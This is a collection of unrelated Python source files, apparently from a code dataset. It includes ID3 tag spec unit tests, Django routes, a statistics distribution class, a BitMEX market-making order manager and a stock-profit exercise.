def testURLStringSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = URLStringSpec("test")
self.nullstringhelper(frame, spec)
self.assertEqual(spec.read(frame, b"\x00\x00"), ("", b""))
self.assertEqual(spec.read(frame, b"Foo\x00\x00"), ("Foo", b"\x00"))
self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
("Foo", b"Bar\x00"))
self.assertEqual(spec.read(frame, b"\x00Bar\x00"), ("Bar", b""))
def testEncodingSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = EncodingSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(FrameError, spec.read, frame, b"\x04")
# spec.write
self.assertEqual(spec.write(frame, 3), b"\x03")
# spec.validate
self.assertEqual(spec.validate(frame, 3), 3)
self.assertEqual(spec.validate(frame, "utf8"), 3)
self.assertEqual(spec.validate(frame, "UTF-8"), 3)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 4)
self.assertRaises(ValueError, spec.validate, frame, "foobar")
self.assertRaises(TypeError, spec.validate, frame, 1.5)
def testEncodedStringSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = EncodedStringSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b""), ("", b""))
self.assertEqual(spec.read(frame, b"Foo"), ("Foo", b""))
self.assertEqual(spec.read(frame, b"Foobar\x00"), ("Foobar", b""))
self.assertEqual(spec.read(frame, b"\x00Foobar"), ("", b"Foobar"))
frame.encoding = "utf-16-be"
self.assertEqual(spec.read(frame, b"\x00F\x00o\x00o"), ("Foo", b""))
self.assertEqual(
spec.read(frame, b"\x00F\x00o\x00o\x00\x00"), ("Foo", b""))
self.assertEqual(
spec.read(frame, b"\x00F\x01\x00\x00a"), ("F\u0100a", b""))
# Broken terminal character
self.assertRaises(EOFError, spec.read, frame, b"\x00F\x00")
# spec.write
frame.encoding = "latin-1"
self.assertEqual(spec.write(frame, ""), b"\x00")
self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
self.assertRaises(UnicodeEncodeError, spec.write, frame, "\u0100")
frame.encoding = "utf-8"
self.assertEqual(spec.write(frame, ""), b"\x00")
self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
self.assertEqual(spec.write(frame, "\u0100"), b"\xC4\x80\x00")
frame.encoding = "utf-16"
self.assertTrue(spec.write(frame, "") in [
b"\xFE\xFF\x00\x00", b"\xFF\xFE\x00\x00"])
self.assertTrue(spec.write(frame, "B") in [
b"\xFE\xFF\x00B\x00\x00", b"\xFF\xFEB\x00\x00\x00"])
frame.encoding = "utf-16-be"
self.assertEqual(spec.write(frame, ""), b"\x00\x00")
self.assertEqual(spec.write(frame, "B"), b"\x00B\x00\x00")
# spec.validate
for encoding in ["latin-1", "utf-16", "utf-16-be", "utf-8"]:
frame.encoding = encoding
self.assertEqual(spec.validate(frame, ""), "")
self.assertEqual(spec.validate(frame, "foo"), "foo")
self.assertEqual(spec.validate(frame, "\xF0"), "\xF0")
self.assertRaises(TypeError, spec.validate, frame, -1)
self.assertRaises(TypeError, spec.validate, frame, 4)
self.assertRaises(TypeError, spec.validate, frame, 3.4)
frame.encoding = "latin-1"
self.assertRaises(UnicodeEncodeError, spec.validate, frame, "\u0100")
def testSequenceSpec(self):
frame = object()
spec = SequenceSpec("test", NullTerminatedStringSpec("text"))
# spec.read
self.assertEqual(spec.read(frame, b""), ([], b""))
self.assertEqual(spec.read(frame, b"Foo"), (["Foo"], b""))
self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
(["Foo", "Bar"], b""))
self.assertEqual(spec.read(frame, b"\x00Foobar"),
(["", "Foobar"], b""))
self.assertEqual(spec.read(frame, b"\x00" * 10), ([""] * 10, b""))
# spec.write
self.assertEqual(spec.write(frame, ""), b"\x00")
self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
self.assertEqual(spec.write(frame, [""] * 10), b"\x00" * 10)
self.assertEqual(spec.write(frame, ["Foo"] * 10), b"Foo\x00" * 10)
# spec.validate
self.assertEqual(spec.validate(frame, ""), [""])
self.assertEqual(spec.validate(frame, [""]), [""])
self.assertEqual(spec.validate(frame, "foo"), ["foo"])
self.assertEqual(spec.validate(frame, ["foo"]), ["foo"])
self.assertEqual(spec.validate(frame, ["foo"] * 10), ["foo"] * 10)
self.assertRaises(TypeError, spec.validate, frame, -1)
self.assertRaises(TypeError, spec.validate, frame, 4)
self.assertRaises(TypeError, spec.validate, frame, 3.4)
def testMultiSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = MultiSpec("test",
NullTerminatedStringSpec("text"),
IntegerSpec("value", 16))
# spec.read
self.assertEqual(spec.read(frame, b""), ([], b""))
self.assertRaises(EOFError, spec.read, frame, b"Foo")
self.assertEqual(spec.read(frame, b"Foo\x00\x01\x02"),
([("Foo", 258)], b""))
self.assertEqual(spec.read(frame, b"Foo\x00\x01\x02Bar\x00\x02\x03"),
([("Foo", 258), ("Bar", 515)], b""))
self.assertEqual(spec.read(frame, b"\x00\x01\x02Foobar\x00\x02\x03"),
([("", 258), ("Foobar", 515)], b""))
# spec.write
self.assertEqual(spec.write(frame, []), b"")
self.assertEqual(spec.write(frame, [("Foo", 1)]), b"Foo\x00\x00\x01")
self.assertEqual(spec.write(frame, [("Foo", 1), ("Bar", 2)]),
b"Foo\x00\x00\x01Bar\x00\x00\x02")
self.assertEqual(spec.write(frame, [("Foo", 1), ("Bar", 2)] * 10),
b"Foo\x00\x00\x01Bar\x00\x00\x02" * 10)
# spec.validate
self.assertEqual(spec.validate(frame, []), [])
self.assertEqual(spec.validate(
frame, [["Foo", 1]] * 10), [("Foo", 1)] * 10)
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, "foo")
self.assertRaises(ValueError, spec.validate, frame, [["Foo", 2, 2]])
def testASPISpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = ASPISpec("test")
# spec.read
frame.b = 1
frame.N = 5
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04\x05\x06\x07"),
([1, 2, 3, 4, 5], b"\x06\x07"))
self.assertRaises(EOFError, spec.read, frame, b"\x01\x02")
frame.b = 2
frame.N = 2
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04\x05\x06\x07"),
([258, 772], b"\x05\x06\x07"))
self.assertRaises(EOFError, spec.read, frame, b"\x01\x02\x03")
# spec.write
frame.b = 1
frame.N = 4
self.assertEqual(spec.write(frame, [1, 2, 3, 4]), b"\x01\x02\x03\x04")
frame.b = 2
self.assertEqual(spec.write(
frame, [1, 2, 3, 4]), b"\x00\x01\x00\x02\x00\x03\x00\x04")
# spec.validate
frame.N = 4
frame.b = 1
self.assertRaises(ValueError, spec.validate, frame, [])
self.assertEqual(spec.validate(frame, [1, 2, 3, 4]), [1, 2, 3, 4])
self.assertEqual(spec.validate(
frame, b"\x01\x02\x03\x04"), [1, 2, 3, 4])
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, "1234")
self.assertRaises(ValueError, spec.validate, frame, [1, 2, 3])
self.assertRaises(ValueError, spec.validate, frame, [1, 2, 3, 4, 5])
def testPictureTypeSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = PictureTypeSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
# spec.write
self.assertEqual(spec.write(frame, 3), b"\x03")
# spec.validate
self.assertEqual(spec.validate(frame, 3), 3)
self.assertEqual(spec.validate(frame, "Front Cover"), 3)
self.assertEqual(spec.validate(frame, "front cover"), 3)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 21)
self.assertRaises(ValueError, spec.validate, frame, "foobar")
self.assertRaises(TypeError, spec.validate, frame, 1.5)
suite = unittest.TestLoader().loadTestsFromTestCase(SpecTestCase)
if __name__ == "__main__":
warnings.simplefilter("always", Warning)
unittest.main(defaultTest="suite")
| StarcoderdataPython |
3387495 | from django.urls import path
from . import views
urlpatterns = [
path('', views.ProfileView.as_view(), name="profile"),
path('edit-avatar/', views.ProfileEditView.as_view(), name="edit-avatar"),
path('messages/', views.MessagesList.as_view(), name="messages"),
path('create-message/', views.Rooms.as_view(), name="create_message"),
path('message/<int:pk>/', views.DetailMessages.as_view(), name="detail_message"),
path('user/<int:pk>/', views.PublicUserInfo.as_view(), name="public_profile"),
path('all-users/', views.AllUserProfile.as_view(), name="all_profiles"),
path('records/<int:pk>/', views.PersonalRecordsList.as_view(), name="personal_records"),
# path('notes/<int:pk>/', views.PublicPersonalRecordsList.as_view(), name="profile_records"),
path('user/<int:pk>/add-record/', views.PersonalRecordsCreate.as_view(), name="add_record"),
path('records-update/<int:pk>/', views.PersonalRecordsUpdate.as_view(), name="update_records"),
path('record/<int:pk>/', views.PersonalRecordsDetail.as_view(), name="detail_record"),
path('delete/<int:pk>/', views.PersonalRecordsDelete.as_view(), name="delete_record"),
path('sorted/', views.SortedPersonalRecords.as_view(), name="sorted_record"),
path('search-user/', views.SearchUser.as_view(), name="search_user"),
path('public-records/', views.AllRecordsOfUsers.as_view(), name="public_records"),
path('edit/', views.PasswordChangeView.as_view(), name="password_edit"),
# api
# path('', api_views.MyProfile.as_view()),
# path('me/', api_views.AboutMe.as_view()),
]
| StarcoderdataPython |
1622645 | """(Non-central) F distribution."""
import numpy
from scipy import special
from ..baseclass import Dist
from ..operators.addition import Add
class f(Dist):
"""F distribution."""
def __init__(self, dfn, dfd, nc):
Dist.__init__(self, dfn=dfn, dfd=dfd, nc=nc)
def _pdf(self, x, dfn, dfd, nc):
n1, n2 = dfn, dfd
term = -nc/2.+nc*n1*x/(2*(n2+n1*x)) + special.gammaln(n1/2.)+special.gammaln(1+n2/2.)
term -= special.gammaln((n1+n2)/2.)
Px = numpy.exp(term)
Px *= n1**(n1/2.) * n2**(n2/2.) * x**(n1/2.-1)
Px *= (n2+n1*x)**(-(n1+n2)/2.)
Px *= special.assoc_laguerre(-nc*n1*x/(2.*(n2+n1*x)), n2/2., n1/2.-1)
Px /= special.beta(n1/2., n2/2.)
return Px
def _cdf(self, x, dfn, dfd, nc):
return special.ncfdtr(dfn, dfd, nc, x)
def _ppf(self, q, dfn, dfd, nc):
return special.ncfdtri(dfn, dfd, nc, q)
def _bnd(self, x, dfn, dfd, nc):
return 0.0, self._ppf(1-1e-10, dfn, dfd, nc)
class F(Add):
"""
(Non-central) F or Fisher-Snedecor distribution.
Args:
n (float, Dist) : Degres of freedom for numerator
m (float, Dist) : Degres of freedom for denominator
scale (float, Dist) : Scaling parameter
shift (float, Dist) : Location parameter
nc (float, Dist) : Non-centrality parameter
Examples:
>>> distribution = chaospy.F(3, 3, 2, 1, 1)
>>> print(distribution)
F(m=3, n=3, nc=1, scale=2, shift=1)
>>> q = numpy.linspace(0, 1, 6)[1:-1]
>>> print(numpy.around(distribution.inv(q), 4))
[1.9336 2.9751 4.7028 8.8521]
>>> print(numpy.around(distribution.fwd(distribution.inv(q)), 4))
[0.2 0.4 0.6 0.8]
>>> print(numpy.around(distribution.pdf(distribution.inv(q)), 4))
[0.2277 0.1572 0.0837 0.027 ]
>>> print(numpy.around(distribution.sample(4), 4))
[ 5.4212 1.5739 25.7656 3.5586]
>>> print(distribution.mom(1) > 10**8) # undefined
True
"""
def __init__(self, n=1, m=1, scale=1, shift=0, nc=0):
self._repr = {"n": n, "m": m, "scale": scale, "shift": shift, "nc": nc}
Add.__init__(self, left=f(n, m, nc)*scale, right=shift)
| StarcoderdataPython |
4800985 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
#-*- coding:utf-8 -*-
from commonTool import *
from config import *
import sys
# In[ ]:
# In[2]:
outputDirPath = outputRawPath + 'priceDaily' + os.path.sep
mkdir(outputDirPath)
# In[ ]:
# In[3]:
d = dt.datetime.today()
# d = d - dt.timedelta(days=1)
dayNo = d.strftime('%Y%m%d')
if len(sys.argv) >= 2:
dayNo = sys.argv[1]
writeDailyPriceFromKRX(dayNo, outputDirPath)
# In[ ]:
| StarcoderdataPython |
1622988 | # Generated by Django 3.1.1 on 2021-04-23 01:19
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('listo_api', '0014_auto_20210422_1904'),
]
operations = [
migrations.RenameField(
model_name='declaraciones',
old_name='user_related',
new_name='users_declaraciones',
),
migrations.RenameField(
model_name='declaracionesdiots',
old_name='users_related',
new_name='users_declaracionesdiots',
),
]
| StarcoderdataPython |
3207806 | import json
f=open("data.json")
data=json.load(f)
for i in data["colors"]:
print(i)
f.close
| StarcoderdataPython |
3246558 | <reponame>lucuma/vd-flask
# coding=utf-8
from authcode import Auth, setup_for_flask
from .. import config
from ..app import app
from ..database import db
from ..models.user_mixin import UserMixin
from .helpers import send_auth_email
auth = Auth(config.SECRET_KEY, db=db, UserMixin=UserMixin, roles=True,
**config.AUTH_SETTINGS)
User = auth.User
Role = auth.Role
setup_for_flask(auth, app, send_email=send_auth_email)
| StarcoderdataPython |
3361304 | <filename>setup.py<gh_stars>1-10
from schroot import __appname__, __version__
from setuptools import setup
long_description = ""
setup(
name=__appname__,
version=__version__,
scripts=[],
packages=[
'schroot',
],
author="<NAME>",
author_email="<EMAIL>",
long_description=long_description,
description='schroot chroot schroots!',
license="Expat",
url="http://pault.ag/",
platforms=['any'],
)
| StarcoderdataPython |
1637029 | <reponame>jsub1/glue-wwt<gh_stars>0
"""Base WWT data viewer implementation, generic over Qt and Jupyter backends."""
from __future__ import absolute_import, division, print_function
from glue.core.coordinates import WCSCoordinates
from .image_layer import WWTImageLayerArtist
from .table_layer import WWTTableLayerArtist
from .viewer_state import WWTDataViewerState
__all__ = ['WWTDataViewerBase']
class WWTDataViewerBase(object):
LABEL = 'WorldWideTelescope (WWT)'
_wwt = None
_state_cls = WWTDataViewerState
def __init__(self):
self._initialize_wwt()
self._wwt.actual_planet_scale = True
self.state.imagery_layers = list(self._wwt.available_layers)
self.state.add_global_callback(self._update_wwt)
self._update_wwt(force=True)
def _initialize_wwt(self):
raise NotImplementedError('subclasses should set _wwt here')
def _update_wwt(self, force=False, **kwargs):
if force or 'mode' in kwargs:
self._wwt.set_view(self.state.mode)
# Only show SDSS data when in Universe mode
self._wwt.solar_system.cosmos = self.state.mode == 'Universe'
# Only show local stars when not in Universe or Milky Way mode
self._wwt.solar_system.stars = self.state.mode not in ['Universe', 'Milky Way']
if force or 'foreground' in kwargs:
self._wwt.foreground = self.state.foreground
if force or 'background' in kwargs:
self._wwt.background = self.state.background
if force or 'foreground_opacity' in kwargs:
self._wwt.foreground_opacity = self.state.foreground_opacity
if force or 'galactic' in kwargs:
self._wwt.galactic_mode = self.state.galactic
def get_layer_artist(self, cls, **kwargs):
"In this package, we must override to append the wwt_client argument."
return cls(self.state, wwt_client=self._wwt, **kwargs)
def get_data_layer_artist(self, layer=None, layer_state=None):
if len(layer.pixel_component_ids) == 2:
if not isinstance(layer.coords, WCSCoordinates):
raise ValueError('WWT cannot render image layer {}: it must have WCS coordinates'.format(layer.label))
cls = WWTImageLayerArtist
elif layer.ndim == 1:
cls = WWTTableLayerArtist
else:
raise ValueError('WWT does not know how to render the data of {}'.format(layer.label))
return cls(self.state, wwt_client=self._wwt, layer=layer, layer_state=layer_state)
def get_subset_layer_artist(self, layer=None, layer_state=None):
# At some point maybe we'll use different classes for this?
return self.get_data_layer_artist(layer=layer, layer_state=layer_state)
| StarcoderdataPython |
21243 | <reponame>Quant-Network/sample-market-maker
from __future__ import absolute_import
from time import sleep
import sys
from datetime import datetime
from os.path import getmtime
import random
import requests
import atexit
import signal
import logging
from market_maker.bitmex import BitMEX
from market_maker.settings import settings
from market_maker.utils import log, constants, errors, math
# Used for reloading the bot - saves modified times of key files
import os
watched_files_mtimes = [(f, getmtime(f)) for f in settings.WATCHED_FILES]
class ExchangeInterface:
def __init__(self):
self.logger = logging.getLogger('root')
if len(sys.argv) > 1:
self.symbol = sys.argv[1]
else:
self.symbol = settings.SYMBOL
self.bitmex = BitMEX(base_url=settings.BASE_URL, symbol=self.symbol,
apiKey=settings.BITMEX_API_KEY, apiSecret=settings.BITMEX_API_SECRET,
orderIDPrefix=settings.ORDERID_PREFIX, postOnly=settings.POST_ONLY,
timeout=settings.TIMEOUT)
def cancel_order(self, order):
tickLog = self.get_instrument()['tickLog']
self.logger.info("Canceling: %s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
while True:
try:
self.bitmex.cancel(order['orderID'])
sleep(settings.API_REST_INTERVAL)
except ValueError as e:
self.logger.info(e)
sleep(settings.API_ERROR_INTERVAL)
else:
break
def cancel_all_orders(self):
self.logger.info("Resetting current position. Canceling all existing orders.")
tickLog = self.get_instrument()['tickLog']
# In certain cases, a WS update might not make it through before we call this.
# For that reason, we grab via HTTP to ensure we grab them all.
orders = self.bitmex.http_open_orders()
for order in orders:
self.logger.info("Canceling: %s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
if len(orders):
self.bitmex.cancel([order['orderID'] for order in orders])
sleep(settings.API_REST_INTERVAL)
def get_portfolio(self):
contracts = settings.CONTRACTS
portfolio = {}
for symbol in contracts:
position = self.bitmex.position(symbol=symbol)
instrument = self.bitmex.instrument(symbol=symbol)
if instrument['isQuanto']:
future_type = "Quanto"
elif instrument['isInverse']:
future_type = "Inverse"
elif not instrument['isQuanto'] and not instrument['isInverse']:
future_type = "Linear"
else:
raise NotImplementedError("Unknown future type; not quanto or inverse: %s" % instrument['symbol'])
if instrument['underlyingToSettleMultiplier'] is None:
multiplier = float(instrument['multiplier']) / float(instrument['quoteToSettleMultiplier'])
else:
multiplier = float(instrument['multiplier']) / float(instrument['underlyingToSettleMultiplier'])
portfolio[symbol] = {
"currentQty": float(position['currentQty']),
"futureType": future_type,
"multiplier": multiplier,
"markPrice": float(instrument['markPrice']),
"spot": float(instrument['indicativeSettlePrice'])
}
return portfolio
def calc_delta(self):
"""Calculate currency delta for portfolio"""
portfolio = self.get_portfolio()
spot_delta = 0
mark_delta = 0
for symbol in portfolio:
item = portfolio[symbol]
if item['futureType'] == "Quanto":
spot_delta += item['currentQty'] * item['multiplier'] * item['spot']
mark_delta += item['currentQty'] * item['multiplier'] * item['markPrice']
elif item['futureType'] == "Inverse":
spot_delta += (item['multiplier'] / item['spot']) * item['currentQty']
mark_delta += (item['multiplier'] / item['markPrice']) * item['currentQty']
elif item['futureType'] == "Linear":
spot_delta += item['multiplier'] * item['currentQty']
mark_delta += item['multiplier'] * item['currentQty']
basis_delta = mark_delta - spot_delta
delta = {
"spot": spot_delta,
"mark_price": mark_delta,
"basis": basis_delta
}
return delta
def get_delta(self, symbol=None):
if symbol is None:
symbol = self.symbol
return self.get_position(symbol)['currentQty']
def get_instrument(self, symbol=None):
if symbol is None:
symbol = self.symbol
return self.bitmex.instrument(symbol)
def get_margin(self):
return self.bitmex.funds()
def get_orders(self):
return self.bitmex.open_orders()
def get_highest_buy(self):
buys = [o for o in self.get_orders() if o['side'] == 'Buy']
if not len(buys):
return {'price': -2**32}
highest_buy = max(buys or [], key=lambda o: o['price'])
return highest_buy if highest_buy else {'price': -2**32}
def get_lowest_sell(self):
sells = [o for o in self.get_orders() if o['side'] == 'Sell']
if not len(sells):
return {'price': 2**32}
lowest_sell = min(sells or [], key=lambda o: o['price'])
return lowest_sell if lowest_sell else {'price': 2**32} # ought to be enough for anyone
def get_position(self, symbol=None):
if symbol is None:
symbol = self.symbol
return self.bitmex.position(symbol)
def get_ticker(self, symbol=None):
if symbol is None:
symbol = self.symbol
return self.bitmex.ticker_data(symbol)
def is_open(self):
"""Check that websockets are still open."""
return not self.bitmex.ws.exited
def is_stable(self):
"""Check that websockets are still stable for use."""
return self.bitmex.ws.is_client_stable()
def check_market_open(self):
instrument = self.get_instrument()
if instrument["state"] != "Open" and instrument["state"] != "Closed":
raise errors.MarketClosedError("The instrument %s is not open. State: %s" %
(self.symbol, instrument["state"]))
def check_if_orderbook_empty(self):
"""This function checks whether the order book is empty"""
instrument = self.get_instrument()
if instrument['midPrice'] is None:
raise errors.MarketEmptyError("Orderbook is empty, cannot quote")
def amend_bulk_orders(self, orders):
return self.bitmex.amend_bulk_orders(orders)
def create_bulk_orders(self, orders):
return self.bitmex.create_bulk_orders(orders)
def cancel_bulk_orders(self, orders):
return self.bitmex.cancel([order['orderID'] for order in orders])
class OrderManager:
def __init__(self):
self.logger = logging.getLogger('root')
self.exchange = ExchangeInterface()
# Once exchange is created, register exit handler that will always cancel orders
# on any error.
atexit.register(self.exit)
signal.signal(signal.SIGTERM, self.exit)
self.logger.info("Using symbol %s." % self.exchange.symbol)
self.logger.info("Order Manager initializing, connecting to BitMEX. Live run: executing real trades.")
self.start_time = datetime.now()
self.instrument = self.exchange.get_instrument()
self.starting_qty = self.exchange.get_delta()
self.running_qty = self.starting_qty
self.reset()
def reset(self):
self.exchange.cancel_all_orders()
self.sanity_check()
self.print_status()
# Create orders and converge.
self.place_orders()
def print_status(self):
"""Print the current MM status."""
raise NotImplementedError("This method has not been implemented.")
def get_ticker(self):
ticker = self.exchange.get_ticker()
# Set up our buy & sell positions
self.start_position_buy = ticker["buy"]
self.start_position_sell = ticker["sell"]
return ticker
def get_price_offset(self, index):
"""Given an index (1, -1) return the price for that side of the book.
-1 is a buy, 1 is a sell."""
# Offset mode: We define a naive quoting and execution method which is basically try to chase the best bids.
start_position = self.start_position_buy if index < 0 else self.start_position_sell
return math.toNearest(start_position, self.instrument['tickSize'])
###
# Orders
###
def place_orders(self):
"""Create order items for use in convergence."""
raise NotImplementedError("This method has not been implemented.")
def prepare_order(self, index):
"""Create an order object."""
raise NotImplementedError("This method has not been implemented.")
def converge_orders(self, buy_orders, sell_orders):
"""Converge the orders we currently have in the book with what we want to be in the book.
This involves amending any open orders and creating new ones if any have filled completely.
We start from the closest orders outward."""
tickLog = self.exchange.get_instrument()['tickLog']
to_amend = []
to_create = []
to_cancel = []
buys_matched = 0
sells_matched = 0
existing_orders = self.exchange.get_orders()
# Check all existing orders and match them up with what we want to place.
# If there's an open one, we might be able to amend it to fit what we want.
for order in existing_orders:
try:
if order['side'] == 'Buy':
desired_order = buy_orders[buys_matched]
buys_matched += 1
else:
desired_order = sell_orders[sells_matched]
sells_matched += 1
# Found an existing order. Do we need to amend it?
if desired_order['orderQty'] != order['orderQty'] or desired_order['price'] != order['price']:
to_amend.append({'orderID': order['orderID'], 'orderQty': desired_order['orderQty'],
'price': desired_order['price'], 'side': order['side']})
except IndexError:
# Will throw if there isn't a desired order to match. In that case, cancel it.
to_cancel.append(order)
while buys_matched < len(buy_orders):
to_create.append(buy_orders[buys_matched])
buys_matched += 1
while sells_matched < len(sell_orders):
to_create.append(sell_orders[sells_matched])
sells_matched += 1
if len(to_amend) > 0:
for amended_order in reversed(to_amend):
reference_order = [o for o in existing_orders if o['orderID'] == amended_order['orderID']][0]
self.logger.info("Amending %4s: %d @ %.*f to %d @ %.*f (%+.*f)" % (
amended_order['side'],
reference_order['leavesQty'], tickLog, reference_order['price'],
(amended_order['orderQty'] - reference_order['cumQty']), tickLog, amended_order['price'],
tickLog, (amended_order['price'] - reference_order['price'])
))
# This can fail if an order has closed in the time we were processing.
# The API will send us `invalid ordStatus`, which means that the order's status (Filled/Canceled)
# made it not amendable.
# If that happens, we need to catch it and re-tick.
try:
self.exchange.amend_bulk_orders(to_amend)
except requests.exceptions.HTTPError as e:
errorObj = e.response.json()
if errorObj['error']['message'] == 'Invalid ordStatus':
self.logger.warn("Amending failed. Waiting for order data to converge and retrying.")
sleep(0.5)
return self.place_orders()
else:
self.logger.error("Unknown error on amend: %s." % errorObj)
if len(to_create) > 0:
self.logger.info("Creating %d orders:" % (len(to_create)))
for order in reversed(to_create):
self.logger.info("%4s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
self.exchange.create_bulk_orders(to_create)
# Could happen if we exceed a delta limit
if len(to_cancel) > 0:
self.logger.info("Canceling %d orders:" % (len(to_cancel)))
for order in reversed(to_cancel):
self.logger.info("%4s %d @ %.*f" % (order['side'], order['leavesQty'], tickLog, order['price']))
self.exchange.cancel_bulk_orders(to_cancel)
###
# Sanity
##
def sanity_check(self):
"""Perform checks before placing orders."""
# Check if OB is empty - if so, can't quote.
self.exchange.check_if_orderbook_empty()
# Ensure market is still open.
self.exchange.check_market_open()
# Get ticker, which sets price offsets and prints some debugging info.
ticker = self.get_ticker()
# Exchange websockets stability check:
if not self.check_exchange_state_stability():
self.logger.warning("Sanity exchange websockets stability check failed, exchange data is no longer reliable. Restarting...")
self.restart()
# Sanity check:
if self.get_price_offset(-1) >= ticker["sell"] or self.get_price_offset(1) <= ticker["buy"]:
self.logger.error("Buy: %s, Sell: %s" % (self.start_position_buy, self.start_position_sell))
self.logger.error("First buy position: %s\nBitMEX Best Ask: %s\nFirst sell position: %s\nBitMEX Best Bid: %s" %
(self.get_price_offset(-1), ticker["sell"], self.get_price_offset(1), ticker["buy"]))
self.logger.error("Sanity check failed, exchange data is inconsistent")
self.restart()
###
# Helpers
###
def determine_contracts_amt(self, satoshi_amt, price):
'''This method calculates the number of contracts for give satoshi amt and contract price. Note: the minimum returned value is 1'''
return max(1, int((satoshi_amt/constants.XBt_TO_XBT) * price))
###
# Running
###
def check_file_change(self):
"""Restart if any files we're watching have changed."""
for f, mtime in watched_files_mtimes:
if getmtime(f) > mtime:
self.restart()
def check_connection(self):
"""Ensure the WS connections are still open."""
return self.exchange.is_open()
def check_exchange_state_stability(self):
"""Ensure the WS is still stable for use."""
return self.exchange.is_stable()
def exit(self):
raise NotImplementedError("This method has not been implemented.")
def run_loop(self):
raise NotImplementedError("This method has not been implemented.")
def restart(self):
raise NotImplementedError("This method has not been implemented.")
#
# Helpers
#
def XBt_to_XBT(XBt):
return float(XBt) / constants.XBt_TO_XBT
def cost(instrument, quantity, price):
mult = instrument["multiplier"]
P = mult * price if mult >= 0 else mult / price
return abs(quantity * P)
def margin(instrument, quantity, price):
return cost(instrument, quantity, price) * instrument["initMargin"] | StarcoderdataPython |
1735566 | <reponame>anton-musrevinu/sharpNAR
#Do enumeration benchmarks
from benchmarks.Benchmarks import Benchmark
from sharpsmt.Manager import Manager
if __name__=='__main__':
pathC = './../mcbenchmarks/algorithms_specs/enumeration_input.csv'
benchmark = Benchmark(False,True)
benchmark.benchmarkModelCounting(pathC,3 * 60 * 60,1)
| StarcoderdataPython |
72367 | #!/usr/bin/env python
#
# A library that provides a Gemynd AI bot interface
# Copyright (C) 2016
# Gemynd AI Team <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from telegramapi.api import *
__author__ = '<EMAIL>'
__version__ = '0.1alpha'
| StarcoderdataPython |
3209591 | <gh_stars>10-100
import os
import shutil
import re
import sys
if __name__ == '__main__':
compress_layer = int(sys.argv[1])
compress_block = int(sys.argv[2])
layers = ['2a', '2b', '2c', '3a', '3b', '3c', '3d', '4a', '4b', '4c', '4d', '4e', '4f', '5a', '5b', '5c']
FileNames = os.listdir(layers[compress_layer]+'_'+str(compress_block)+'/snapshot/')
max_value = 0
for i in range(len(FileNames)):
name = re.findall(r"_iter_(.+?).caffemodel", FileNames[i])
if len(name) > 0:
if int(name[0]) > max_value:
max_value = int(name[0])
filename = layers[compress_layer]+'_'+str(compress_block)+'/snapshot/_iter_'+str(max_value)+".caffemodel"
shutil.copyfile(filename, "model.caffemodel")
| StarcoderdataPython |
1667504 | <reponame>Sem8/js-mock-interview-code-challenges<gh_stars>0
# My own solution: Stock prices to find maximum profit but you have to buy first before sell
# '''Pseudocode: O(n^2) solution with nested for loop
# 1. Initialize a variable called max profit and set it equal to the difference between 1st and 2nd element prices in the array.
# 2. Loop through the array with index i starting at 0 and ending at 2nd to last element.
# 3. Make an inner loop inside outer loop and start at index after the outer loop's index of i and ending at the last element.
# 4. Make an if statement of if element at inner loops index minus element at outer loop's index is greater than the initial
# max_profit that was set then re-assign max profit to the current difference of element at current inner loop index minus element at outer
# loop index.
# 5. return final max profit.
# '''
# def stock_prices(arr):
# max_profit = arr[1] - arr[0]
# for i in range(0, len(arr) - 1):
# for j in range(i+1, len(arr)):
# if arr[j] - arr[i] > max_profit:
# max_profit = arr[j] - arr[i]
# return max_profit
# My own solution for stock prices with O(2n) time complexity:
'''Pseudocode: Solution with 1 for loop O(2n) = ~O(n) time complexity:
1. Set variable called initial_buy to 1st array element
2. set variable called initial_sell to 2nd array element
3. Loop through the array starting from 1 all the way to end.
4. Make if statement, check if current element at current index is more than initial_sell then reset initial_sell to that variable.
5. Make another for loop outside the previous for loop (not nested inner for loop) starting at index 1 all the way to end of array.
6. Make if statement inside the above 2nd for loop to check if current element at current index is less than initial_buy (from 1st array element)
and that the index of this current element at current index is at a lower index than the index of the updated initial_sell value from the array.
If so, reset initial_buy to this current array element at current index that meets this condition.
7. Return the difference between the updated initial_sell minus initial_buy
'''
# def stock_prices(arr):
# initial_buy = arr[0]
# initial_sell = arr[1]
# for i in range(1, len(arr)):
# if arr[i] > initial_sell:
# initial_sell = arr[i]
# for i in range(1, len(arr)):
